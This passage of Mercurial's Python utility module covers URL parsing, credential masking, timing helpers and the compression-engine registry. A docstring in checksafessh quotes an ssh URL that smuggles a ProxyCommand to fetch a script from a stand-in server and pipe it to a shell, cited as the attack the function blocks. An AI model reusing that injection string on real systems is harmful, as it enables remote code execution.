2784 2785 if (self.host and ':' in self.host and
2785 2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 2787 self._hostport = self.host
2787 2788 self.host, self.port = self.host.rsplit(':', 1)
2788 2789 if not self.host:
2789 2790 self.host = None
2790 2791
2791 2792 if (self.host and self.scheme == 'file' and
2792 2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 2795
2795 2796 self.path = path
2796 2797
2797 2798 # leave the query string escaped
2798 2799 for a in ('user', 'passwd', 'host', 'port',
2799 2800 'path', 'fragment'):
2800 2801 v = getattr(self, a)
2801 2802 if v is not None:
2802 2803 setattr(self, a, urlreq.unquote(v))
2803 2804
2804 2805 @encoding.strmethod
2805 2806 def __repr__(self):
2806 2807 attrs = []
2807 2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 2809 'query', 'fragment'):
2809 2810 v = getattr(self, a)
2810 2811 if v is not None:
2811 2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 2813 return '<url %s>' % ', '.join(attrs)
2813 2814
2814 2815 def __bytes__(self):
2815 2816 r"""Join the URL's components back into a URL string.
2816 2817
2817 2818 Examples:
2818 2819
2819 2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 2823 'http://user:pw@host:80/?foo=bar&baz=42'
2823 2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 2827 'ssh://user:pw@[::1]:2200//home/joe#'
2827 2828 >>> bytes(url(b'http://localhost:80//'))
2828 2829 'http://localhost:80//'
2829 2830 >>> bytes(url(b'http://localhost:80/'))
2830 2831 'http://localhost:80/'
2831 2832 >>> bytes(url(b'http://localhost:80'))
2832 2833 'http://localhost:80/'
2833 2834 >>> bytes(url(b'bundle:foo'))
2834 2835 'bundle:foo'
2835 2836 >>> bytes(url(b'bundle://../foo'))
2836 2837 'bundle:../foo'
2837 2838 >>> bytes(url(b'path'))
2838 2839 'path'
2839 2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2840 2841 'file:///tmp/foo/bar'
2841 2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2842 2843 'file:///c:/tmp/foo/bar'
2843 2844 >>> print(url(br'bundle:foo\bar'))
2844 2845 bundle:foo\bar
2845 2846 >>> print(url(br'file:///D:\data\hg'))
2846 2847 file:///D:\data\hg
2847 2848 """
2848 2849 if self._localpath:
2849 2850 s = self.path
2850 2851 if self.scheme == 'bundle':
2851 2852 s = 'bundle:' + s
2852 2853 if self.fragment:
2853 2854 s += '#' + self.fragment
2854 2855 return s
2855 2856
2856 2857 s = self.scheme + ':'
2857 2858 if self.user or self.passwd or self.host:
2858 2859 s += '//'
2859 2860 elif self.scheme and (not self.path or self.path.startswith('/')
2860 2861 or hasdriveletter(self.path)):
2861 2862 s += '//'
2862 2863 if hasdriveletter(self.path):
2863 2864 s += '/'
2864 2865 if self.user:
2865 2866 s += urlreq.quote(self.user, safe=self._safechars)
2866 2867 if self.passwd:
2867 2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 2869 if self.user or self.passwd:
2869 2870 s += '@'
2870 2871 if self.host:
2871 2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 2873 s += urlreq.quote(self.host)
2873 2874 else:
2874 2875 s += self.host
2875 2876 if self.port:
2876 2877 s += ':' + urlreq.quote(self.port)
2877 2878 if self.host:
2878 2879 s += '/'
2879 2880 if self.path:
2880 2881 # TODO: similar to the query string, we should not unescape the
2881 2882 # path when we store it, the path might contain '%2f' = '/',
2882 2883 # which we should *not* escape.
2883 2884 s += urlreq.quote(self.path, safe=self._safepchars)
2884 2885 if self.query:
2885 2886 # we store the query in escaped form.
2886 2887 s += '?' + self.query
2887 2888 if self.fragment is not None:
2888 2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 2890 return s
2890 2891
2891 2892 __str__ = encoding.strmethod(__bytes__)
2892 2893
2893 2894 def authinfo(self):
2894 2895 user, passwd = self.user, self.passwd
2895 2896 try:
2896 2897 self.user, self.passwd = None, None
2897 2898 s = bytes(self)
2898 2899 finally:
2899 2900 self.user, self.passwd = user, passwd
2900 2901 if not self.user:
2901 2902 return (s, None)
2902 2903 # authinfo[1] is passed to urllib2 password manager, and its
2903 2904 # URIs must not contain credentials. The host is passed in the
2904 2905 # URIs list because Python < 2.4.3 uses only that to search for
2905 2906 # a password.
2906 2907 return (s, (None, (s, self.host),
2907 2908 self.user, self.passwd or ''))
2908 2909
2909 2910 def isabs(self):
2910 2911 if self.scheme and self.scheme != 'file':
2911 2912 return True # remote URL
2912 2913 if hasdriveletter(self.path):
2913 2914 return True # absolute for our purposes - can't be joined()
2914 2915 if self.path.startswith(br'\\'):
2915 2916 return True # Windows UNC path
2916 2917 if self.path.startswith('/'):
2917 2918 return True # POSIX-style
2918 2919 return False
2919 2920
2920 2921 def localpath(self):
2921 2922 if self.scheme == 'file' or self.scheme == 'bundle':
2922 2923 path = self.path or '/'
2923 2924 # For Windows, we need to promote hosts containing drive
2924 2925 # letters to paths with drive letters.
2925 2926 if hasdriveletter(self._hostport):
2926 2927 path = self._hostport + '/' + self.path
2927 2928 elif (self.host is not None and self.path
2928 2929 and not hasdriveletter(path)):
2929 2930 path = '/' + path
2930 2931 return path
2931 2932 return self._origpath
2932 2933
2933 2934 def islocal(self):
2934 2935 '''whether localpath will return something that posixfile can open'''
2935 2936 return (not self.scheme or self.scheme == 'file'
2936 2937 or self.scheme == 'bundle')
2937 2938
2938 2939 def hasscheme(path):
2939 2940 return bool(url(path).scheme)
2940 2941
2941 2942 def hasdriveletter(path):
2942 2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 2944
2944 2945 def urllocalpath(path):
2945 2946 return url(path, parsequery=False, parsefragment=False).localpath()
2946 2947
2947 2948 def checksafessh(path):
2948 2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 2950
2950 2951 This is a sanity check for ssh urls. ssh will parse the first item as
2951 2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 2953 Let's prevent these potentially exploited urls entirely and warn the
2953 2954 user.
2954 2955
2955 2956 Raises an error.Abort when the url is unsafe.
2956 2957 """
2957 2958 path = urlreq.unquote(path)
2958 2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 2960 raise error.Abort(_('potentially unsafe url: %r') %
2960 2961 (pycompat.bytestr(path),))
2961 2962
2962 2963 def hidepassword(u):
2963 2964 '''hide user credential in a url string'''
2964 2965 u = url(u)
2965 2966 if u.passwd:
2966 2967 u.passwd = '***'
2967 2968 return bytes(u)
2968 2969
2969 2970 def removeauth(u):
2970 2971 '''remove all authentication information from a url string'''
2971 2972 u = url(u)
2972 2973 u.user = u.passwd = None
2973 2974 return bytes(u)
2974 2975
2975 2976 timecount = unitcountfn(
2976 2977 (1, 1e3, _('%.0f s')),
2977 2978 (100, 1, _('%.1f s')),
2978 2979 (10, 1, _('%.2f s')),
2979 2980 (1, 1, _('%.3f s')),
2980 2981 (100, 0.001, _('%.1f ms')),
2981 2982 (10, 0.001, _('%.2f ms')),
2982 2983 (1, 0.001, _('%.3f ms')),
2983 2984 (100, 0.000001, _('%.1f us')),
2984 2985 (10, 0.000001, _('%.2f us')),
2985 2986 (1, 0.000001, _('%.3f us')),
2986 2987 (100, 0.000000001, _('%.1f ns')),
2987 2988 (10, 0.000000001, _('%.2f ns')),
2988 2989 (1, 0.000000001, _('%.3f ns')),
2989 2990 )
2990 2991
2991 2992 @attr.s
2992 2993 class timedcmstats(object):
2993 2994 """Stats information produced by the timedcm context manager on entering."""
2994 2995
2995 2996 # the starting value of the timer as a float (meaning and resulution is
2996 2997 # platform dependent, see util.timer)
2997 2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2998 2999 # the number of seconds as a floating point value; starts at 0, updated when
2999 3000 # the context is exited.
3000 3001 elapsed = attr.ib(default=0)
3001 3002 # the number of nested timedcm context managers.
3002 3003 level = attr.ib(default=1)
3003 3004
3004 3005 def __bytes__(self):
3005 3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3006 3007
3007 3008 __str__ = encoding.strmethod(__bytes__)
3008 3009
3009 3010 @contextlib.contextmanager
3010 3011 def timedcm(whencefmt, *whenceargs):
3011 3012 """A context manager that produces timing information for a given context.
3012 3013
3013 3014 On entering a timedcmstats instance is produced.
3014 3015
3015 3016 This context manager is reentrant.
3016 3017
3017 3018 """
3018 3019 # track nested context managers
3019 3020 timedcm._nested += 1
3020 3021 timing_stats = timedcmstats(level=timedcm._nested)
3021 3022 try:
3022 3023 with tracing.log(whencefmt, *whenceargs):
3023 3024 yield timing_stats
3024 3025 finally:
3025 3026 timing_stats.elapsed = timer() - timing_stats.start
3026 3027 timedcm._nested -= 1
3027 3028
3028 3029 timedcm._nested = 0
3029 3030
3030 3031 def timed(func):
3031 3032 '''Report the execution time of a function call to stderr.
3032 3033
3033 3034 During development, use as a decorator when you need to measure
3034 3035 the cost of a function, e.g. as follows:
3035 3036
3036 3037 @util.timed
3037 3038 def foo(a, b, c):
3038 3039 pass
3039 3040 '''
3040 3041
3041 3042 def wrapper(*args, **kwargs):
3042 3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3043 3044 result = func(*args, **kwargs)
3044 3045 stderr = procutil.stderr
3045 3046 stderr.write('%s%s: %s\n' % (
3046 3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3047 3048 time_stats))
3048 3049 return result
3049 3050 return wrapper
3050 3051
3051 3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3052 3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3053 3054
3054 3055 def sizetoint(s):
3055 3056 '''Convert a space specifier to a byte count.
3056 3057
3057 3058 >>> sizetoint(b'30')
3058 3059 30
3059 3060 >>> sizetoint(b'2.2kb')
3060 3061 2252
3061 3062 >>> sizetoint(b'6M')
3062 3063 6291456
3063 3064 '''
3064 3065 t = s.strip().lower()
3065 3066 try:
3066 3067 for k, u in _sizeunits:
3067 3068 if t.endswith(k):
3068 3069 return int(float(t[:-len(k)]) * u)
3069 3070 return int(t)
3070 3071 except ValueError:
3071 3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3072 3073
3073 3074 class hooks(object):
3074 3075 '''A collection of hook functions that can be used to extend a
3075 3076 function's behavior. Hooks are called in lexicographic order,
3076 3077 based on the names of their sources.'''
3077 3078
3078 3079 def __init__(self):
3079 3080 self._hooks = []
3080 3081
3081 3082 def add(self, source, hook):
3082 3083 self._hooks.append((source, hook))
3083 3084
3084 3085 def __call__(self, *args):
3085 3086 self._hooks.sort(key=lambda x: x[0])
3086 3087 results = []
3087 3088 for source, hook in self._hooks:
3088 3089 results.append(hook(*args))
3089 3090 return results
3090 3091
3091 3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3092 3093 '''Yields lines for a nicely formatted stacktrace.
3093 3094 Skips the 'skip' last entries, then return the last 'depth' entries.
3094 3095 Each file+linenumber is formatted according to fileline.
3095 3096 Each line is formatted according to line.
3096 3097 If line is None, it yields:
3097 3098 length of longest filepath+line number,
3098 3099 filepath+linenumber,
3099 3100 function
3100 3101
3101 3102 Not be used in production code but very convenient while developing.
3102 3103 '''
3103 3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3104 3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3105 3106 ][-depth:]
3106 3107 if entries:
3107 3108 fnmax = max(len(entry[0]) for entry in entries)
3108 3109 for fnln, func in entries:
3109 3110 if line is None:
3110 3111 yield (fnmax, fnln, func)
3111 3112 else:
3112 3113 yield line % (fnmax, fnln, func)
3113 3114
3114 3115 def debugstacktrace(msg='stacktrace', skip=0,
3115 3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3116 3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3117 3118 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3118 3119 By default it will flush stdout first.
3119 3120 It can be used everywhere and intentionally does not require an ui object.
3120 3121 Not be used in production code but very convenient while developing.
3121 3122 '''
3122 3123 if otherf:
3123 3124 otherf.flush()
3124 3125 f.write('%s at:\n' % msg.rstrip())
3125 3126 for line in getstackframes(skip + 1, depth=depth):
3126 3127 f.write(line)
3127 3128 f.flush()
3128 3129
3129 3130 class dirs(object):
3130 3131 '''a multiset of directory names from a dirstate or manifest'''
3131 3132
3132 3133 def __init__(self, map, skip=None):
3133 3134 self._dirs = {}
3134 3135 addpath = self.addpath
3135 3136 if safehasattr(map, 'iteritems') and skip is not None:
3136 3137 for f, s in map.iteritems():
3137 3138 if s[0] != skip:
3138 3139 addpath(f)
3139 3140 else:
3140 3141 for f in map:
3141 3142 addpath(f)
3142 3143
3143 3144 def addpath(self, path):
3144 3145 dirs = self._dirs
3145 3146 for base in finddirs(path):
3146 3147 if base in dirs:
3147 3148 dirs[base] += 1
3148 3149 return
3149 3150 dirs[base] = 1
3150 3151
3151 3152 def delpath(self, path):
3152 3153 dirs = self._dirs
3153 3154 for base in finddirs(path):
3154 3155 if dirs[base] > 1:
3155 3156 dirs[base] -= 1
3156 3157 return
3157 3158 del dirs[base]
3158 3159
3159 3160 def __iter__(self):
3160 3161 return iter(self._dirs)
3161 3162
3162 3163 def __contains__(self, d):
3163 3164 return d in self._dirs
3164 3165
3165 3166 if safehasattr(parsers, 'dirs'):
3166 3167 dirs = parsers.dirs
3167 3168
3168 3169 def finddirs(path):
3169 3170 pos = path.rfind('/')
3170 3171 while pos != -1:
3171 3172 yield path[:pos]
3172 3173 pos = path.rfind('/', 0, pos)
3173 3174
3174 3175 # compression code
3175 3176
3176 3177 SERVERROLE = 'server'
3177 3178 CLIENTROLE = 'client'
3178 3179
3179 3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3180 3181 (u'name', u'serverpriority',
3181 3182 u'clientpriority'))
3182 3183
3183 3184 class compressormanager(object):
3184 3185 """Holds registrations of various compression engines.
3185 3186
3186 3187 This class essentially abstracts the differences between compression
3187 3188 engines to allow new compression formats to be added easily, possibly from
3188 3189 extensions.
3189 3190
3190 3191 Compressors are registered against the global instance by calling its
3191 3192 ``register()`` method.
3192 3193 """
3193 3194 def __init__(self):
3194 3195 self._engines = {}
3195 3196 # Bundle spec human name to engine name.
3196 3197 self._bundlenames = {}
3197 3198 # Internal bundle identifier to engine name.
3198 3199 self._bundletypes = {}
3199 3200 # Revlog header to engine name.
3200 3201 self._revlogheaders = {}
3201 3202 # Wire proto identifier to engine name.
3202 3203 self._wiretypes = {}
3203 3204
3204 3205 def __getitem__(self, key):
3205 3206 return self._engines[key]
3206 3207
3207 3208 def __contains__(self, key):
3208 3209 return key in self._engines
3209 3210
3210 3211 def __iter__(self):
3211 3212 return iter(self._engines.keys())
3212 3213
3213 3214 def register(self, engine):
3214 3215 """Register a compression engine with the manager.
3215 3216
3216 3217 The argument must be a ``compressionengine`` instance.
3217 3218 """
3218 3219 if not isinstance(engine, compressionengine):
3219 3220 raise ValueError(_('argument must be a compressionengine'))
3220 3221
3221 3222 name = engine.name()
3222 3223
3223 3224 if name in self._engines:
3224 3225 raise error.Abort(_('compression engine %s already registered') %
3225 3226 name)
3226 3227
3227 3228 bundleinfo = engine.bundletype()
3228 3229 if bundleinfo:
3229 3230 bundlename, bundletype = bundleinfo
3230 3231
3231 3232 if bundlename in self._bundlenames:
3232 3233 raise error.Abort(_('bundle name %s already registered') %
3233 3234 bundlename)
3234 3235 if bundletype in self._bundletypes:
3235 3236 raise error.Abort(_('bundle type %s already registered by %s') %
3236 3237 (bundletype, self._bundletypes[bundletype]))
3237 3238
3238 3239 # No external facing name declared.
3239 3240 if bundlename:
3240 3241 self._bundlenames[bundlename] = name
3241 3242
3242 3243 self._bundletypes[bundletype] = name
3243 3244
3244 3245 wiresupport = engine.wireprotosupport()
3245 3246 if wiresupport:
3246 3247 wiretype = wiresupport.name
3247 3248 if wiretype in self._wiretypes:
3248 3249 raise error.Abort(_('wire protocol compression %s already '
3249 3250 'registered by %s') %
3250 3251 (wiretype, self._wiretypes[wiretype]))
3251 3252
3252 3253 self._wiretypes[wiretype] = name
3253 3254
3254 3255 revlogheader = engine.revlogheader()
3255 3256 if revlogheader and revlogheader in self._revlogheaders:
3256 3257 raise error.Abort(_('revlog header %s already registered by %s') %
3257 3258 (revlogheader, self._revlogheaders[revlogheader]))
3258 3259
3259 3260 if revlogheader:
3260 3261 self._revlogheaders[revlogheader] = name
3261 3262
3262 3263 self._engines[name] = engine
3263 3264
3264 3265 @property
3265 3266 def supportedbundlenames(self):
3266 3267 return set(self._bundlenames.keys())
3267 3268
3268 3269 @property
3269 3270 def supportedbundletypes(self):
3270 3271 return set(self._bundletypes.keys())
3271 3272
3272 3273 def forbundlename(self, bundlename):
3273 3274 """Obtain a compression engine registered to a bundle name.
3274 3275
3275 3276 Will raise KeyError if the bundle type isn't registered.
3276 3277
3277 3278 Will abort if the engine is known but not available.
3278 3279 """
3279 3280 engine = self._engines[self._bundlenames[bundlename]]
3280 3281 if not engine.available():
3281 3282 raise error.Abort(_('compression engine %s could not be loaded') %
3282 3283 engine.name())
3283 3284 return engine
3284 3285
3285 3286 def forbundletype(self, bundletype):
3286 3287 """Obtain a compression engine registered to a bundle type.
3287 3288
3288 3289 Will raise KeyError if the bundle type isn't registered.
3289 3290
3290 3291 Will abort if the engine is known but not available.
3291 3292 """
3292 3293 engine = self._engines[self._bundletypes[bundletype]]
3293 3294 if not engine.available():
3294 3295 raise error.Abort(_('compression engine %s could not be loaded') %
3295 3296 engine.name())
3296 3297 return engine
3297 3298
3298 3299 def supportedwireengines(self, role, onlyavailable=True):
3299 3300 """Obtain compression engines that support the wire protocol.
3300 3301
3301 3302 Returns a list of engines in prioritized order, most desired first.
3302 3303
3303 3304 If ``onlyavailable`` is set, filter out engines that can't be
3304 3305 loaded.
3305 3306 """
3306 3307 assert role in (SERVERROLE, CLIENTROLE)
3307 3308
3308 3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3309 3310
3310 3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3311 3312 if onlyavailable:
3312 3313 engines = [e for e in engines if e.available()]
3313 3314
3314 3315 def getkey(e):
3315 3316 # Sort first by priority, highest first. In case of tie, sort
3316 3317 # alphabetically. This is arbitrary, but ensures output is
3317 3318 # stable.
3318 3319 w = e.wireprotosupport()
3319 3320 return -1 * getattr(w, attr), w.name
3320 3321
3321 3322 return list(sorted(engines, key=getkey))
3322 3323
3323 3324 def forwiretype(self, wiretype):
3324 3325 engine = self._engines[self._wiretypes[wiretype]]
3325 3326 if not engine.available():
3326 3327 raise error.Abort(_('compression engine %s could not be loaded') %
3327 3328 engine.name())
3328 3329 return engine
3329 3330
3330 3331 def forrevlogheader(self, header):
3331 3332 """Obtain a compression engine registered to a revlog header.
3332 3333
3333 3334 Will raise KeyError if the revlog header value isn't registered.
3334 3335 """
3335 3336 return self._engines[self._revlogheaders[header]]
3336 3337
3337 3338 compengines = compressormanager()
3338 3339
3339 3340 class compressionengine(object):
3340 3341 """Base class for compression engines.
3341 3342
3342 3343 Compression engines must implement the interface defined by this class.
3343 3344 """
3344 3345 def name(self):
3345 3346 """Returns the name of the compression engine.
3346 3347
3347 3348 This is the key the engine is registered under.
3348 3349
3349 3350 This method must be implemented.
3350 3351 """
3351 3352 raise NotImplementedError()
3352 3353
3353 3354 def available(self):
3354 3355 """Whether the compression engine is available.
3355 3356
3356 3357 The intent of this method is to allow optional compression engines
3357 3358 that may not be available in all installations (such as engines relying
3358 3359 on C extensions that may not be present).
3359 3360 """
3360 3361 return True
3361 3362
3362 3363 def bundletype(self):
3363 3364 """Describes bundle identifiers for this engine.
3364 3365
3365 3366 If this compression engine isn't supported for bundles, returns None.
3366 3367
3367 3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3368 3369 the user-facing "bundle spec" compression name and an internal
3369 3370 identifier used to denote the compression format within bundles. To
3370 3371 exclude the name from external usage, set the first element to ``None``.
3371 3372
3372 3373 If bundle compression is supported, the class must also implement
3373 3374 ``compressstream`` and `decompressorreader``.
3374 3375
3375 3376 The docstring of this method is used in the help system to tell users
3376 3377 about this engine.
3377 3378 """
3378 3379 return None
3379 3380
3380 3381 def wireprotosupport(self):
3381 3382 """Declare support for this compression format on the wire protocol.
3382 3383
3383 3384 If this compression engine isn't supported for compressing wire
3384 3385 protocol payloads, returns None.
3385 3386
3386 3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3387 3388 fields:
3388 3389
3389 3390 * String format identifier
3390 3391 * Integer priority for the server
3391 3392 * Integer priority for the client
3392 3393
3393 3394 The integer priorities are used to order the advertisement of format
3394 3395 support by server and client. The highest integer is advertised
3395 3396 first. Integers with non-positive values aren't advertised.
3396 3397
3397 3398 The priority values are somewhat arbitrary and only used for default
3398 3399 ordering. The relative order can be changed via config options.
3399 3400
3400 3401 If wire protocol compression is supported, the class must also implement
3401 3402 ``compressstream`` and ``decompressorreader``.
3402 3403 """
3403 3404 return None
3404 3405
3405 3406 def revlogheader(self):
3406 3407 """Header added to revlog chunks that identifies this engine.
3407 3408
3408 3409 If this engine can be used to compress revlogs, this method should
3409 3410 return the bytes used to identify chunks compressed with this engine.
3410 3411 Else, the method should return ``None`` to indicate it does not
3411 3412 participate in revlog compression.
3412 3413 """
3413 3414 return None
3414 3415
3415 3416 def compressstream(self, it, opts=None):
3416 3417 """Compress an iterator of chunks.
3417 3418
3418 3419 The method receives an iterator (ideally a generator) of chunks of
3419 3420 bytes to be compressed. It returns an iterator (ideally a generator)
3420 3421 of bytes of chunks representing the compressed output.
3421 3422
3422 3423 Optionally accepts an argument defining how to perform compression.
3423 3424 Each engine treats this argument differently.
3424 3425 """
3425 3426 raise NotImplementedError()
3426 3427
3427 3428 def decompressorreader(self, fh):
3428 3429 """Perform decompression on a file object.
3429 3430
3430 3431 Argument is an object with a ``read(size)`` method that returns
3431 3432 compressed data. Return value is an object with a ``read(size)`` that
3432 3433 returns uncompressed data.
3433 3434 """
3434 3435 raise NotImplementedError()
3435 3436
3436 3437 def revlogcompressor(self, opts=None):
3437 3438 """Obtain an object that can be used to compress revlog entries.
3438 3439
3439 3440 The object has a ``compress(data)`` method that compresses binary
3440 3441 data. This method returns compressed binary data or ``None`` if
3441 3442 the data could not be compressed (too small, not compressible, etc).
3442 3443 The returned data should have a header uniquely identifying this
3443 3444 compression format so decompression can be routed to this engine.
3444 3445 This header should be identified by the ``revlogheader()`` return
3445 3446 value.
3446 3447
3447 3448 The object has a ``decompress(data)`` method that decompresses
3448 3449 data. The method will only be called if ``data`` begins with
3449 3450 ``revlogheader()``. The method should return the raw, uncompressed
3450 3451 data or raise a ``StorageError``.
3451 3452
3452 3453 The object is reusable but is not thread safe.
3453 3454 """
3454 3455 raise NotImplementedError()
3455 3456
3456 3457 class _CompressedStreamReader(object):
3457 3458 def __init__(self, fh):
3458 3459 if safehasattr(fh, 'unbufferedread'):
3459 3460 self._reader = fh.unbufferedread
3460 3461 else:
3461 3462 self._reader = fh.read
3462 3463 self._pending = []
3463 3464 self._pos = 0
3464 3465 self._eof = False
3465 3466
3466 3467 def _decompress(self, chunk):
3467 3468 raise NotImplementedError()
3468 3469
3469 3470 def read(self, l):
3470 3471 buf = []
3471 3472 while True:
3472 3473 while self._pending:
3473 3474 if len(self._pending[0]) > l + self._pos:
3474 3475 newbuf = self._pending[0]
3475 3476 buf.append(newbuf[self._pos:self._pos + l])
3476 3477 self._pos += l
3477 3478 return ''.join(buf)
3478 3479
3479 3480 newbuf = self._pending.pop(0)
3480 3481 if self._pos:
3481 3482 buf.append(newbuf[self._pos:])
3482 3483 l -= len(newbuf) - self._pos
3483 3484 else:
3484 3485 buf.append(newbuf)
3485 3486 l -= len(newbuf)
3486 3487 self._pos = 0
3487 3488
3488 3489 if self._eof:
3489 3490 return ''.join(buf)
3490 3491 chunk = self._reader(65536)
3491 3492 self._decompress(chunk)
3492 3493 if not chunk and not self._pending and not self._eof:
3493 3494 # No progress and no new data, bail out
3494 3495 return ''.join(buf)
3495 3496
3496 3497 class _GzipCompressedStreamReader(_CompressedStreamReader):
3497 3498 def __init__(self, fh):
3498 3499 super(_GzipCompressedStreamReader, self).__init__(fh)
3499 3500 self._decompobj = zlib.decompressobj()
3500 3501 def _decompress(self, chunk):
3501 3502 newbuf = self._decompobj.decompress(chunk)
3502 3503 if newbuf:
3503 3504 self._pending.append(newbuf)
3504 3505 d = self._decompobj.copy()
3505 3506 try:
3506 3507 d.decompress('x')
3507 3508 d.flush()
3508 3509 if d.unused_data == 'x':
3509 3510 self._eof = True
3510 3511 except zlib.error:
3511 3512 pass
3512 3513
3513 3514 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3514 3515 def __init__(self, fh):
3515 3516 super(_BZ2CompressedStreamReader, self).__init__(fh)
3516 3517 self._decompobj = bz2.BZ2Decompressor()
3517 3518 def _decompress(self, chunk):
3518 3519 newbuf = self._decompobj.decompress(chunk)
3519 3520 if newbuf:
3520 3521 self._pending.append(newbuf)
3521 3522 try:
3522 3523 while True:
3523 3524 newbuf = self._decompobj.decompress('')
3524 3525 if newbuf:
3525 3526 self._pending.append(newbuf)
3526 3527 else:
3527 3528 break
3528 3529 except EOFError:
3529 3530 self._eof = True
3530 3531
3531 3532 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3532 3533 def __init__(self, fh):
3533 3534 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3534 3535 newbuf = self._decompobj.decompress('BZ')
3535 3536 if newbuf:
3536 3537 self._pending.append(newbuf)
3537 3538
3538 3539 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3539 3540 def __init__(self, fh, zstd):
3540 3541 super(_ZstdCompressedStreamReader, self).__init__(fh)
3541 3542 self._zstd = zstd
3542 3543 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3543 3544 def _decompress(self, chunk):
3544 3545 newbuf = self._decompobj.decompress(chunk)
3545 3546 if newbuf:
3546 3547 self._pending.append(newbuf)
3547 3548 try:
3548 3549 while True:
3549 3550 newbuf = self._decompobj.decompress('')
3550 3551 if newbuf:
3551 3552 self._pending.append(newbuf)
3552 3553 else:
3553 3554 break
3554 3555 except self._zstd.ZstdError:
3555 3556 self._eof = True
3556 3557
3557 3558 class _zlibengine(compressionengine):
3558 3559 def name(self):
3559 3560 return 'zlib'
3560 3561
3561 3562 def bundletype(self):
3562 3563 """zlib compression using the DEFLATE algorithm.
3563 3564
3564 3565 All Mercurial clients should support this format. The compression
3565 3566 algorithm strikes a reasonable balance between compression ratio
3566 3567 and size.
3567 3568 """
3568 3569 return 'gzip', 'GZ'
3569 3570
3570 3571 def wireprotosupport(self):
3571 3572 return compewireprotosupport('zlib', 20, 20)
3572 3573
3573 3574 def revlogheader(self):
3574 3575 return 'x'
3575 3576
3576 3577 def compressstream(self, it, opts=None):
3577 3578 opts = opts or {}
3578 3579
3579 3580 z = zlib.compressobj(opts.get('level', -1))
3580 3581 for chunk in it:
3581 3582 data = z.compress(chunk)
3582 3583 # Not all calls to compress emit data. It is cheaper to inspect
3583 3584 # here than to feed empty chunks through generator.
3584 3585 if data:
3585 3586 yield data
3586 3587
3587 3588 yield z.flush()
3588 3589
3589 3590 def decompressorreader(self, fh):
3590 3591 return _GzipCompressedStreamReader(fh)
3591 3592
3592 3593 class zlibrevlogcompressor(object):
3593 3594 def compress(self, data):
3594 3595 insize = len(data)
3595 3596 # Caller handles empty input case.
3596 3597 assert insize > 0
3597 3598
3598 3599 if insize < 44:
3599 3600 return None
3600 3601
3601 3602 elif insize <= 1000000:
3602 3603 compressed = zlib.compress(data)
3603 3604 if len(compressed) < insize:
3604 3605 return compressed
3605 3606 return None
3606 3607
3607 3608 # zlib makes an internal copy of the input buffer, doubling
3608 3609 # memory usage for large inputs. So do streaming compression
3609 3610 # on large inputs.
3610 3611 else:
3611 3612 z = zlib.compressobj()
3612 3613 parts = []
3613 3614 pos = 0
3614 3615 while pos < insize:
3615 3616 pos2 = pos + 2**20
3616 3617 parts.append(z.compress(data[pos:pos2]))
3617 3618 pos = pos2
3618 3619 parts.append(z.flush())
3619 3620
3620 3621 if sum(map(len, parts)) < insize:
3621 3622 return ''.join(parts)
3622 3623 return None
3623 3624
3624 3625 def decompress(self, data):
3625 3626 try:
3626 3627 return zlib.decompress(data)
3627 3628 except zlib.error as e:
3628 3629 raise error.StorageError(_('revlog decompress error: %s') %
3629 3630 stringutil.forcebytestr(e))
3630 3631
3631 3632 def revlogcompressor(self, opts=None):
3632 3633 return self.zlibrevlogcompressor()
3633 3634
3634 3635 compengines.register(_zlibengine())
3635 3636
3636 3637 class _bz2engine(compressionengine):
3637 3638 def name(self):
3638 3639 return 'bz2'
3639 3640
3640 3641 def bundletype(self):
3641 3642 """An algorithm that produces smaller bundles than ``gzip``.
3642 3643
3643 3644 All Mercurial clients should support this format.
3644 3645
3645 3646 This engine will likely produce smaller bundles than ``gzip`` but
3646 3647 will be significantly slower, both during compression and
3647 3648 decompression.
3648 3649
3649 3650 If available, the ``zstd`` engine can yield similar or better
3650 3651 compression at much higher speeds.
3651 3652 """
3652 3653 return 'bzip2', 'BZ'
3653 3654
